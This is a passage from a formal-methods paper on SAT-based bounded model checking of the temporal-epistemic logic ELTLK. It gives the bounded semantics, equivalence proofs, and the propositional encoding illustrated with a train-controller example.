g_1)(g_0, g_2)^{\omega } = (g_0, g_1, g_0, g_2, g_0, g_2, g_0, g_2,\ldots )\). Fig. 7 A model. We assume that we have one agent that has three states: \(g_0,\,g_1\) and \(g_2\). The state \(g_0\) is initial, and the epistemic relation is \(\{(g_0 \sim g_0),(g_1 \sim g_1),(g_2 \sim g_2)\}\) As in the definition of the semantics one needs to define the satisfiability relation on suffixes of \(k\)-paths, we denote by \(\rho _l[m]\) the \(k\)-path \(\rho _l\) together with the designated starting point \(m\), where \(0 {\,\leqslant \,}m {\,\leqslant \,}k\). Definition 4 (Bounded semantics) Let \(M =(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V })\) be a model defined for either IIS or IS, \(k {\,\geqslant \,}0\) a bound, and \(\varphi \) an ELTLK formula. The formula \(\varphi \) is \(k\)—true along the \(k\)-path \(\rho _l\) (in symbols \(M,\rho _l \models _k \varphi \)) iff \(M, \rho _l[0] \models _k \varphi \), where $$\begin{aligned} \begin{array}{l@{\quad }l} M, \rho _l[m] \models {{true}}, &{} \\ M, \rho _l[m] \not \models {false}, &{} \\ M,\rho _l[m] \models _{k} p \text { iff } &{} p \in {\mathcal{V }}(\rho (m)),\\ M,\rho _l[m] \models _{k} \lnot p \text { iff } &{} p \not \in {\mathcal{V }}(\rho (m)),\\ M,\rho _l[m] \models _{k} \varphi \vee \psi \text { iff } &{} M,\rho _l[m] \models _k \varphi \text { or } M,\rho _l[m] \models _k \psi ,\\ M,\rho _l[m] \models _k \varphi \wedge \psi \text { iff } &{} M,\rho _l[m] \models _k \varphi \text { and } M,\rho _l[m] \models _k \psi ,\\ M,\rho _l[m] \models _k \mathrm{X}\varphi \text { iff } &{} m<k \text { and } M,\rho _l[m+1] \models _k \varphi \text { or }\\ &{}m=k \text { and } l < k \text { and } \rho (k) = \rho (l) \text { and } M,\rho _l[l+1] \models _k \varphi ,\\ M,\rho _l[m] \models _k \varphi \mathrm{U}\psi \text { iff } &{} (\exists m {\,\leqslant \,}i{\,\leqslant \,}k) (M,\rho _l[i] \models _k \psi \text { and }(\forall m {\,\leqslant \,}j < i) M,\rho _l[j] \models _k \varphi )\\ &{}\text { or }(\rho (k) = \rho (l)\text { and } l < m \text { and }(\exists l < i < m) (M,\rho _l[i] \models _k \psi \\ &{}\text { and }(\forall m \!{\,\leqslant \,}\! j {\,\leqslant \,}k) M,\rho _l[j] \models _k \varphi \text { and } (\forall l \!{\,\leqslant \,}\! j < i) M,\rho _l[j] \models _k \varphi )),\\ M,\rho _l[m] \models _k \varphi \mathrm{R}\psi \text { iff } &{} (\forall min(l,m) {\,\leqslant \,}i {\,\leqslant \,}k) (\rho (k) = \rho (l)\text { and } l<k \text { and } M,\rho _l[i] \models _k \psi )\text { or } \\ &{}(\exists m {\,\leqslant \,}i {\,\leqslant \,}k) (M,\rho _l[i] \models _k \varphi \text { and } (\forall m {\,\leqslant \,}j {\,\leqslant \,}i) M,\rho _l[j] \models _k \psi )\text { or }\\ &{}(\rho (k) = \rho (l)\text { and } l < m \text { and } (\exists l < i < m) (M,\rho _l[i] \models _k \varphi \text { and }\\ &{}(\forall m {\,\leqslant \,}j {\,\leqslant \,}k) M,\rho _l[j] \models _k \psi \text { and } (\forall l {\,\leqslant \,}j {\,\leqslant \,}i) M,\rho _l[j] \models _k \psi )),\\ M,\rho _l[m] \models _k {\overline{\mathrm{{K}}}}_{{ c}} \varphi \text { iff } &{} (\exists \rho '_{l'} \in {\varPi _k}(\iota )) (\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k}) M, \rho '_{l'}[j] \models _k \varphi ) \text { and } \rho (m) \sim _{{ c}} \rho '(j)),\\ M,\rho _l[m] \models _k \overline{Y}_{\varGamma }\varphi \text { iff } &{} (\exists \rho '_{l'} \in {\varPi _k}(\iota )) (\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k}) (M, \rho '_{l'}[j] \models _{k} \varphi ) \text { and } \rho (m) \sim ^Y_{\varGamma } \rho '(j)),\\ &{}\text { where } Y \in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}. \\ \end{array} \end{aligned}$$ We use the following notation \(M \models ^{\exists }_{k} \varphi \) iff \(M,\rho _l \models _k \varphi \) for some \(\rho _l \in {\varPi _k}(\iota )\). The SAT-based bounded model checking problem consists in finding out whether there exists \(k \in \mathrm{I\!N}\) such that \(M \models ^{\exists }_k \varphi \). Let \(m\) be a formula evaluation position, \(k\) a bound, and \(p,q \in \mathcal{PV }\). An illustration of the bounded semantics is shown in Figs. 8, 9, 10, 11, 12. Fig. 8 Evaluation of formulae of the Next state type. The highlighted states are the same, i.e. \(\rho _l(l)=\rho _l(k)\) Fig. 9 Evaluation of formulae of the Until type. The highlighted states are the same, i.e. \(\rho _l(l)=\rho _l(k)\) Fig. 10 Evaluation of formulae of the Release type. The highlighted states are the same, i.e. \(\rho _l(l)=\rho _l(k)\) Fig. 11 Evaluation of formulae of the Release type. The highlighted states are the same, i.e. \(\rho _l(l)=\rho _l(k)\) Fig. 12 Evaluation of existential epistemic formulae. The highlighted states are epistemically equivalent 3.2.2 Equivalence of the bounded and unbounded semantics Now, we show that for some particular bound the bounded semantics is equivalent to the unbounded semantics. Lemma 2 Let \(M\) be a model, \(\varphi \) an ELTLK formula, \(k>0\) a bound, \(\rho _l\) a \(k\)-path in \(M\), and \(0{\,\leqslant \,}m {\,\leqslant \,}k\). The following implication holds: \(M,\rho _l[m] \models _k \varphi \) implies 1. 1. if \(\rho _l\) is not a loop, then \(M, \pi [m] \models \varphi \) for each run \(\pi \) in \(M\) such that \(\pi [..k] = \rho \).   2. 2. if \(\rho _l\) is a loop, then \(M, \varrho (\rho _l)[m] \models \varphi \).   Proof (Induction on the length of \(\varphi \)) The lemma follows directly for the propositional variables and their negations. Consider \(\varphi \) to be of the following form: 1. 1. Let \(\varphi =\psi _1 \vee \psi _2 \mid \psi _1 \wedge \psi _2 \mid \mathrm{X}\psi \mid \psi _1 \mathrm{U}\psi _2 \mid \psi _1 \mathrm{R}\psi _2\). By induction hypothesis—see Lemma 2.1. of [55].   2. 2. \(\varphi = {\overline{\mathrm{{K}}}}_{{ c}}\psi \). From \(M, \rho _l[m] \models _{k} \varphi \) it follows that \((\exists \rho '_{l'} \in {\varPi _k}(\iota ))(\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})\,({M,\rho '_{l'}}[j] \models _k \psi \) and \(\rho (m) \sim _{{ c}} \rho '(j))\). Assume that both \(\rho _l\) and \(\rho '_{l'}\) are not loops. By inductive hypothesis, for every run \(\pi '\) in \(M\) such that \(\pi '[..k] = \rho ',\,(\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})(M,\pi '[j] \models \psi \) and \(\rho (m) \sim _{{ c}} \pi '(j))\). Further, for every run \(\pi \) in \(M\) such that \(\pi [..k] = \rho \), we have that \(\pi (m) \sim _{{ c}} \rho '(j)\). Thus, for every run \(\pi \) in \(M\) such that \(\pi [..k] = \rho ,\,M, \pi [m] \models \varphi \). Now assume that \(\rho '_{l'}\) is not a loop and \(\rho _l\) is a loop. By inductive hypothesis, for every run \(\pi '\) in \(M\) such that \(\pi '[..k] = \rho ',\,(\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k}) (M,\pi '[j] \models \psi \) and \(\rho (m) \sim _{{ c}} \pi '(j))\). Further, observe that \(\varrho (\rho _l)(m)=\rho (m)\), thus \(M, \varrho (\rho _l)[m] \models \varphi \). Now assume that both \(\rho _l\) and \(\rho '_{l'}\) are loops. By inductive hypothesis, \((\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})\)\(({M,\varrho (\rho '_{l'})}[j] \models \psi \) and \(\rho (m) \sim _{{ c}} \varrho (\rho '_{l'})(j))\). Further, observe that \(\varrho (\rho _l)(m)=\rho (m)\), thus \(M, \varrho (\rho _l)[m] \models \varphi \). Now assume that \(\rho '_{l'}\) is a loop, and \(\rho _l\) is not a loop. By inductive hypothesis, \((\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})(M,\varrho (\rho '_{l'})[j] \models \psi \) and \(\rho (m) \sim _{{ c}} \varrho (\rho '_{l'})(j))\). Further, for every run \(\pi \) in \(M\) such that \(\pi [..k] = \rho \), we have that \(\pi (m) \sim _{{ c}} \varrho (\rho '_{l'})(j)\). Thus, for every run \(\pi \) in \(M\) such that \(\pi [..k] = \rho ,\,M, \pi [m] \models \varphi \).   3. 3. Let \(\varphi =\overline{Y}_{\varGamma }\psi \), where \(Y \in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}\). These cases can be proven analogously to the case 2.   Lemma 3 (Theorem 3.1 of [5]) Let \(M\) be a model, \(\alpha \) an LTL formula, and \(\rho \) a run. Then, the following implication holds: \(M, \rho \models \alpha \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\pi _l \models _k \alpha \) with \(\rho [..k] = \pi \). Lemma 4 Let \(M\) be a model, \(\alpha \) an LTL formula, \(Y \in \{{\overline{\mathrm{{K}}}}_{{ c}}, {\overline{\mathrm{{D}}}}_{\varGamma }, {\overline{\mathrm{E}}}_{\varGamma }, {\overline{\mathrm{{C}}}}_{\varGamma }\}\), and \(\rho \) a run. Then, the following implication holds: \(M,\rho \models Y\alpha \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\pi _l \models _k Y\alpha \) with \(\rho [..k] = \pi \). Proof Let \(X^j\) denote the next-time operator applied \(j\) times, i.e., \(X^j = \underbrace{X\ldots X}_{j}\). 1. 1. Let \(Y = {\overline{\mathrm{{K}}}}_{{ c}}\). Then \(M,\rho \models {\overline{\mathrm{{K}}}}_{{ c}}\alpha \) iff \(M,\rho [0] \models {\overline{\mathrm{{K}}}}_{{ c}}\alpha \) iff \((\exists \rho ' \in \varPi (\iota ))\)\((\exists j{\,\geqslant \,}0)[\rho '(j) \sim _{{ c}} \rho (0)\) and \(M,\rho '[j] \models \alpha ]\). Since \(\rho '(j)\) is reachable from the initial state of \(M\), the checking of \(M,\rho '[j] \models \alpha \) is equivalent to the checking of \(M,\rho '[0] \models \mathrm{X}^j\alpha \). Now since \(\mathrm{X}^j\alpha \) is a pure LTL formula, by Lemma 3 we have that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\pi '_l[0] \models _k \mathrm{X}^j\alpha \) with \(\rho '[..k] = \pi '\). This implies that \(M,\pi '_l[j] \models _k \alpha \) with \(\rho '[..k] = \pi '\), for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\). Now, since \(\rho '(j) \sim _{{ c}} \rho (0)\), we have \(\pi '(j) \sim _{{ c}} \pi (0)\). Thus, by the bounded semantics we have that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\pi _l \models _k {\overline{\mathrm{{K}}}}_{{ c}}\alpha \) with \(\rho [..k] = \pi \).   2. 2. Let \(Y = {\overline{\mathrm{{D}}}}_{\varGamma }\). Then \(M,\rho \models {\overline{\mathrm{{D}}}}_{\varGamma }\alpha \) iff \(M,\rho [0] \models {\overline{\mathrm{{D}}}}_{\varGamma }\alpha \) iff \((\exists \rho ' \in \varPi (\iota ))(\exists j{\,\geqslant \,}0)\)\([\rho '(j) \sim ^\mathrm{{D}}_\varGamma \rho (0)\) and \(M,\rho '[j] \models \alpha ]\). Since \(\rho '(j)\) is reachable from the initial state of \(M\), the checking of \(M,\rho '[j] \models \alpha \) is equivalent to the checking of \(M,\rho '[0] \models \mathrm{X}^j\alpha \). Now since \(\mathrm{X}^j\alpha \) is a pure LTL formula, by Lemma 3 we have that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\pi '_l[0] \models _k \mathrm{X}^j\alpha \) with \(\rho '[..k] = \pi '\). This implies that \(M,\pi '_l[j] \models _k \alpha \) with \(\rho '[..k] = \pi '\), for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\). Now, since \(\rho '(j) \sim ^{\mathrm{{D}}}_{\varGamma } \rho (0)\), we have \(\pi '(j) \sim ^{\mathrm{{D}}}_{\varGamma } \pi (0)\). Thus, by the bounded semantics we have for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\rho _l \models _k {\overline{\mathrm{{D}}}}_{\varGamma }\alpha \) with \(\rho [..k] = \pi \).   3. 3. Let \(Y = {\overline{\mathrm{E}}}_{\varGamma }\). Since \({\overline{\mathrm{E}}}_{\varGamma }\alpha = \bigvee _{{ c}\in \varGamma } {\overline{\mathrm{{K}}}}_{{ c}} \alpha \), the lemma follows from the case 1.   4. 4. Let \(Y = {\overline{\mathrm{{C}}}}_{\varGamma }\). Since \({\overline{\mathrm{{C}}}}_{\varGamma }\alpha = \bigvee _{i=1}^{n} ({\overline{\mathrm{E}}}_{\varGamma })^i \alpha \), where \(n\) is the size of the model \(M\), the lemma follows from the case 3.   Lemma 5 Let \(M\) be a model, \(\varphi \) an ELTLK formula, and \(\rho \) a run. Then, the following implication holds: \(M,\rho \models \varphi \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\pi _l \models _k \varphi \) with \(\rho [..k] = \pi \). Proof (Induction on the length of \(\varphi \)) The lemma follows directly for the propositional variables and their negations. Assume that the hypothesis holds for all the proper subformulas of \(\varphi \) and consider \(\varphi \) to be of the following form: 1. 1. \(\varphi = \psi _1 \vee \psi _2 \mid \psi _1 \wedge \psi _2 \mid \mathrm{X}\psi \mid \psi _1 \mathrm{U}\psi _2 \mid \psi _1 \mathrm{R}\psi _2\). Straightforward by the induction hypothesis and Lemma 3.   2. 2. Let \(\varphi =Y\alpha \), and \(Y,Y_1,\ldots ,Y_n, Z \in \{{\overline{\mathrm{{K}}}}_{{ c}}, {\overline{\mathrm{{D}}}}_{\varGamma }, {\overline{\mathrm{E}}}_{\varGamma }, {\overline{\mathrm{{C}}}}_{\varGamma }\}\). Moreover, let \(Y_1\alpha _1, \ldots ,\)\(Y_n \alpha _n\) be the list of all “top level” proper \(Y\)-subformulas of \(\alpha \) (i.e., each \(Y_i\alpha _i\) is a subformula of \(Y\alpha \), but it is not a subformula of any subformula \(Z\beta \) of \(Y\alpha \), where \(Z\beta \) is different from \(Y\alpha \) and from \(Y\alpha _i\) for \(i=1, \ldots , n\)). If this list is empty, then \(\alpha \) is a “pure” LTL formula with no nested epistemic modalities. Hence, by Lemma 4 we have \(M,\rho \models \varphi \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\pi _l \models _k \varphi \) with \(\rho [..k] = \pi \). Otherwise, introduce for each \(Y_i\alpha _i\) a new proposition \(q_i\), where \(i=1,\ldots ,n\). By Lemma 1, we can augment with \(q_i\) the labelling of each state \(s\) of \(M\) initialising some run along which the epistemic formula \(Y_i\alpha _i\) holds, and then translate the formula \(\alpha \) to the formula \(\alpha '\), which instead of each subformula \(Y_i\alpha _i\) contains adequate propositions \(q_i\). Therefore, we obtain “pure” LTL formula. Hence, by Lemma 4 we have \(M,\rho \models \varphi \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k,\,M,\pi _l \models _k \varphi \) with \(\rho [..k] = \pi \).   The following lemma states that if we take all possible bounds into account, then the bounded and unbounded semantics are equivalent. Lemma 6 Let \(M\) be a model, \(\varphi \) an ELTLK formula. Then the following equivalence holds: \(M \models ^{\exists } \varphi \) iff there exists \(k{\,\geqslant \,}0\) such that \(M \models ^{\exists }_{k} \varphi \). Proof (“\(\Leftarrow \)”) Follows directly from Lemma 2. (“\(\Rightarrow \)”) Follows directly from Lemma 5. 3.2.3 Translation to the propositional satisfiability problem Let \(M =(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V })\) be a model generated by IS or IIS—the encoding of global states of \(M\) is independent of the kind of considered interpreted system—and \(k \in \mathrm{I\!N}\) be a bound. Since the set of global states of \(M\) is finite, every element \(g=(\ell _1,\ldots ,\ell _n,\ell _{{e}})\) of \(G\) can be encoded as a bit vector of some length \(r\). Then, each state of \(M\) can be represented by a valuation of a vector \(w=(\mathtt{w}_1, \ldots , \mathtt{w}_r)\) (called a symbolic state) of different propositional variables called state variables; further we assume that \(SV\) denotes the set of all the state variables, \(SV(w)\) denotes the set of all the state variables occurring in the symbolic state \(w\), and \(I_{{ c}}\) denote the set of indexes of state variables that represent local states of agent \({ c}\). Example 1 Let \(SV=\{\mathtt{w}_1,\mathtt{w}_2,\ldots \}\) be an infinite set of state variables. Consider the FTC system shown on Fig. 1 for two trains. A propositional encoding of all the local states of the two agents representing trains and an agent representing Controller is the following: \(Train \;1\) \(Train \;2\) \(State\) \(Bit_2\) \(Bit_1\) \(Formula\) \(State\) \(Bit_4\) \(Bit_3\) \(Formula\) \(Away_1\) 0 0 \(\lnot \mathtt{w}_1 \wedge \lnot \mathtt{w}_2\) \(Away_2\) 0 0 \(\lnot \mathtt{w}_3 \wedge \lnot \mathtt{w}_4\) \(Wait_1\) 1 0 \(\lnot \mathtt{w}_1 \wedge \mathtt{w}_2\) \(Wait_2\) 1 0 \(\lnot \mathtt{w}_3 \wedge \mathtt{w}_4\) \(Tunnel_1\) 0 1 \(\mathtt{w}_1 \wedge \lnot \mathtt{w}_2\) \(Tunnel_2\) 0 1 \(\mathtt{w}_3 \wedge \lnot \mathtt{w}_4\)   \(Controller\)   \(Location\) \(Bit_5\) \(Formula\) \(Green\) 0 \(\lnot \mathtt{w}_5\) \(Red\) 1 \(\mathtt{w}_5\) Thus, given the above, it is easy to see that each state of the model of the FTC system can be represented by a valuation of a symbolic state \(w = (\mathtt{w}_1, \ldots , \mathtt{w}_5)\). Let \(NV\) denote the set of propositional variables, called the natural variables, such that \(SV \cap NV = \emptyset \). Moreover, let \(u = (\mathtt{u}_1 , \ldots , \mathtt{u}_t )\) be a vector of natural variables of some length \(t\), which we call a symbolic number, and \(NV(u)\) denote the set of all the natural variables occurring in \(u\). Further, let \(PV = SV \cup NV\) and \(V: PV \rightarrow \{0,1\}\) be a valuation of propositional variables (a valuation for short). Each valuation induces the functions \({\mathbf{S}}: SV^r \rightarrow \{0,1\}^r\) and \(\mathbf{J}: NV^t \rightarrow \mathrm{I\!N}\) defined in the following way: $$\begin{aligned} {\mathbf{S}}((\mathtt{w}_{1},\ldots , \mathtt{w}_{r}))&= (V(\mathtt{w}_{1}),\ldots , V(\mathtt{w}_{r}))\end{aligned}$$ (1) $$\begin{aligned} {\mathbf{J}}((\mathtt{u}_{1},\ldots , \mathtt{u}_{t}))&= \sum _{i=1}^t V(\mathtt{u}_{i})\cdot 2^{i-1} \end{aligned}$$ (2) Now let \(w\) and \(w'\) be two symbolic states such that \(SV(w) \cap SV(w') = \emptyset \), and \(u\) be a symbolic number. We recall the definitions of the following auxiliary propositional formulae: • \(I_g(w):{=} \bigwedge _{i=1}^r lit(g[i],\mathtt{w}_i)\), where \(lit: \{0,1\}\times PV \rightarrow PV \cup \{ \lnot q \mid q \in PV \}\) is a function defined as: \(lit(1,q)=q\) and \(lit(0,q)= \lnot q\). This formula, defined over \(SV(w)\), encodes the state \(g\) of the model \(M\). Example 2 Consider the FTC system shown on Fig. 1 for two trains. Then, the propositional formula \(I_{\iota }(w)\), which encodes the initial global state of the system, is defined as follows: \(I_{\iota }(w)= \lnot \mathtt{w}_1 \wedge \lnot \mathtt{w}_2 \wedge \lnot \mathtt{w}_3 \wedge \lnot \mathtt{w}_4 \wedge \lnot \mathtt{w}_5\). • \(H(w,w') :{=} \bigwedge _{i=1}^r \mathtt{w}_i \Leftrightarrow \mathtt{w'}_i \). This formula, defined over \(SV(w) \cup SV(w')\), encodes equivalence between two symbolic states. It represent the fact that the symbolic states \(w\) and \(w'\) represent the same states. • \(H_{{ c}}(w,w'):{=} \bigwedge _{i\in I_{{ c}} } \mathtt{w}_i \Leftrightarrow \mathtt{w'}_i \). This formula, defined over \(SV(w) \cup SV(w')\), represent the fact that the local states of agent \({ c}\) are the same in the symbolic states \(w\) and \(w'\). • \(p(w)\) is a formula over \(SV(w)\) that is true for a valuation \(V\) iff \(p \in {\mathcal{V }}(\mathbf{S}(w))\). This formula encodes a set of the states of \(M\) in which proposition variable \(p \in \mathcal{PV }\) holds. • \({\mathcal{R }}(w,w')\) is a formula over \(SV(w) \cup SV(w')\) that is true for a valuation \(V\) iff \((\mathbf{S}(w), \mathbf{S}(w')) \in T\). This formula encodes the transition relation of \(M\). The formal definition of this formula is different for \(M\) which is generated for IS and for \(M\) which is generated for IIS. • \({\mathcal{B }}_j^{\thicksim }(u)\) is a formula over \(NV(u)\) that is true for a valuation \(V\) iff \(j \thicksim \mathbf{J}(u)\), where \(\thicksim \in \{<,>,\leqslant ,=,\geqslant \}\). Let \(M =(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V })\) be a model, \(\varphi \) an ELTLK formula, and \(k{\,\geqslant \,}0\) a bound. We translate the problem of checking whether \(M\) is a model for \(\varphi \) to the problem of checking the satisfiability of the following propositional formula: $$\begin{aligned}{}[M,\varphi ]_{k} \,{:=}\, [M^{\varphi ,\iota }]_k \; \wedge \; [\varphi ]_{M,k} \end{aligned}$$ (3) In order to define the formula \([M^{\varphi ,\iota }]_k\) we need to specify the number of \(k\)-paths of the model \(M\) that are sufficient to validate \(\varphi \). To calculate the number, we need the following auxiliary function \(f_k : {\mathrm{ELTLK }}\rightarrow \mathrm{I\!N}\): • \(f_k({{true}}) = f_k({false}) = f_k(p) =f_k(\lnot p)= 0\), if \(p \in \mathcal{PV }\), • \(f_k(\varphi \vee \psi ) = max\{f_k(\varphi ) , f_k(\psi )\}\), • \(f_k(\varphi \wedge \psi ) = f_k(\varphi ) + f_k(\psi )\), • \(f_k(\mathrm{X}\varphi ) = f_k(\varphi )\), • \(f_k(\varphi \mathrm{U}\psi ) = k \cdot f_k(\varphi ) + f_k(\psi )\), • \(f_k(\varphi \mathrm{R}\psi ) = (k+1) \cdot f_k(\psi )+ f_k(\varphi )\), • \(f_k(\overline{Y} \varphi ) = f_k(\varphi ) +1\), for \(\overline{Y} \in \{{\overline{\mathrm{{K}}}}_{{ c}}, {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{E}}}_\varGamma \}\), • \(f_k({\overline{\mathrm{{C}}}}_\varGamma \varphi ) = f_k(\varphi ) + k\). Note that \({\overline{\mathrm{{C}}}}_\varGamma \varphi = \bigvee _{i=1}^{k} ({\overline{\mathrm{E}}}_\varGamma )^i\varphi \) and \(f_k(({\overline{\mathrm{E}}}_\varGamma )^1\varphi ) =f_k({\overline{\mathrm{E}}}_\varGamma \varphi ) = f_k(\varphi ) + 1\). It is easy to show, by induction on \(i\), that \(f_k(({\overline{\mathrm{E}}}_\varGamma )^i\varphi ) = f_k(\varphi ) + i\), for \(i \in \{1, \ldots ,k\}\). Therefore, \(f_k({\overline{\mathrm{{C}}}}_\varGamma \varphi )=f_k(\bigvee _{i=1}^{k} ({\overline{\mathrm{E}}}_\varGamma )^i\varphi )=max\{f_k(({\overline{\mathrm{E}}}_\varGamma )^1\varphi ), \ldots , f_k(({\overline{\mathrm{E}}}_\varGamma )^k\varphi )\}=f_k(({\overline{\mathrm{E}}}_\varGamma )^k\varphi )=f_k(\varphi )+k\). Now since in the BMC method we deal with the existential validity \((\models ^{\exists })\), the number of \(k\)-paths sufficient to validate \(\varphi \) is given by the function \(\widehat{f_k} : {\mathrm{ELTLK }}\rightarrow \mathrm{I\!N}\) that is defined as \(\widehat{f_k}(\varphi ) = f_k(\varphi ) + 1\). Example 3 Let \(p\in \mathcal{PV },\,k\) be a bound. Now we calculate the number of \(k\)-paths that are sufficient to validate different ELTLK formulae. • Let \(\varphi =\mathrm{F}p \). Then, \(\widehat{f_k}(\mathrm{F}p)=\)\(f_k(\mathrm{F}p)+1=f_k(p)+1= 1\); note that \(\mathrm{F}\alpha = {{true}}\mathrm{U}\alpha \). • Let \(\varphi =\mathrm{G}\mathrm{F}p \). Then, \(\widehat{f_k}(\mathrm{G}\mathrm{F}p)=\)\(f_k(\mathrm{G}\mathrm{F}p)+1=\)\((k+1) \cdot f_k(\mathrm{F}p)+1=\)\((k+1) \cdot f_k(p)+1= 1\); note that \(\mathrm{G}\alpha = {false}\mathrm{R}\alpha \). • Let \(\varphi =\mathrm{G}\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\!p\). Then, \(\widehat{f_k}(\mathrm{G}\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\!p)\)\(=f_k(\mathrm{G}\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\!p)+1\)\(=(k+1) \cdot f_k(\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\!p)+1\)\(=(k+1) \cdot f_k({\overline{\mathrm{{K}}}}_{{ c}}\!p)+1\)\(=(k+1) \cdot (f_k(p)+1)+1\)\(=(k+1) \cdot 1+1 = k+2\). An example of a model and a witness for the formula is shown on Fig. 13. Observe that while the value \(\widehat{f_1}(\varphi )\) is 3, and the witness for \(\varphi \) can be of the form shown on Fig. 13b, there is a witness for \(\varphi \) which consists of two 1-paths only—see Fig. 13c. Thus, one can observe that the function \(\widehat{f_k}\) only gives an upper bound on the number of \(k\)-paths that form a witness for an ELTLK formula. Fig. 13 Illustration of the function \(f_k\) for \(k=1\) and the formula \(\varphi =\mathrm{G}\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}} p\). In Figure b we assume that \(\alpha ={\overline{\mathrm{{K}}}}_{{ c}} p\). a A model \(M\). b Three different 1-paths of \(M\). c Two different 1-paths of \(M\) Let \(W=\{SV(w_{i,j}) \mid 0 {\,\leqslant \,}i {\,\leqslant \,}k\text { and } 1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\} \cup \{NV(u_j) \mid 1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\}\) be a set of propositional variables. The propositional formula \([M^{\varphi ,\iota }]_k\) is defined over the set \(W\) in the following way: $$\begin{aligned}&[M^{\varphi ,\iota }]_{k} \,{:=}\, I_{\iota }(w_{0,0})\wedge \bigvee _{j=1}^{\widehat{f_k}(\varphi )} H(w_{0,0},w_{0,j})\wedge \bigwedge _{j=1}^{\widehat{f_k}(\varphi )} \bigwedge ^{k-1}_{i=0} {\mathcal{R }}(w_{i,j}, w_{i+1,j}) \wedge \nonumber \\&\quad \quad \quad \quad \quad \quad \bigwedge _{j=1}^{\widehat{f_k}(\varphi )} \bigvee _{l=0}^{k} B_l^{=}(u_{j}) \end{aligned}$$ (4) where \(w_{i,j}\) and \(u_j\) are, respectively, symbolic states and a symbolic number for \(0{\,\leqslant \,}i {\,\leqslant \,}k\) and \(1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\). Note that Formula 4 encodes \(\widehat{f_k}(\varphi )\) valid \(k\)-paths of the model \(M\) that start at the initial state \(\iota \). In particular, the formula defines \(\widehat{f_k}(\varphi )\)symbolic\(k\)-paths such that the \(j\)-th symbolic \(k\)-path \({\varvec{\pi }}_j\) is of the form \(((w_{0,j},\ldots ,w_{k,j}),u_j)\), where \(w_{i,j}\) is a symbolic state for \(1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\) and \(0 {\,\leqslant \,}i {\,\leqslant \,}k\), and \(u_j\) is a symbolic number for \(1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\). The next step is a translation of an ELTLK formula \(\varphi \) to a propositional formula $$\begin{aligned}{}[\varphi ]_{M,k} \text { :{=} } [\varphi ]^{[0,1,F_k(\varphi )]}_{k} \end{aligned}$$ (5) where \(F_k(\varphi ) = \{j \in \mathrm{I\!N}\;|\;1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\}\), and \([\varphi ]^{[m,n,A]}_k\) denotes the translation of \(\varphi \) along the \(n\)-th symbolic path \({\varvec{\pi }}^m_n\) with the starting point \(m\) by using the set \(A \subseteq F_k(\varphi )\). For every ELTLK formula \(\varphi \) the function \(\widehat{f_k}\) determines how many symbolic \(k\)-paths are needed for translating the formula \(\varphi \). Given a formula \(\varphi \) and a set \(A\) of \(k\)-paths such that \(|A| = \widehat{f_k}(\varphi )\), we divide the set \(A\) into subsets needed for translating the subformulae of \(\varphi \). To accomplish this goal we need some auxiliary functions that were defined in [55]. We recall the definitions of these functions. First, the relation \(\prec \) is defined on the power set of \(\mathrm{I\!N}\) as follows: \(A \prec B\) iff for all natural numbers \(x\) and \(y\), if \(x \in A\) and \(y \in B\), then \(x < y\). Now, let \(A \subset \mathrm{I\!N}\) be a finite nonempty set, and \(n, d \in \mathrm{I\!N}\), where \(d \leqslant |A|\). Then, • \(g_l(A, d)\) denotes the subset \(B\) of \(A\) such that \(|B| = d\) and \(B \prec A \setminus B\), e.g., \(g_l(\{4,5,6,7,8\}, 3) = \{4,5,6\}\). • \(g_r(A, d)\) denotes the subset \(C\) of \(A\) such that \(|C| = d\) and \(A \setminus C \prec C\), e.g., \(g_r(\{4,5,6,7,8\}, 3) = \{6,7,8\}\). • \(g_s(A)\) denotes the set \(A \setminus \{min(A)\}\), e.g., \(g_{s}(\{4,5,6,7,8\}) = \{5,6,7,8\}\). • if \(n\) divides \(|A| - d\), then \(hp(A, d, n)\) denotes the sequence \((B_0, \ldots , B_{n})\) of subsets of 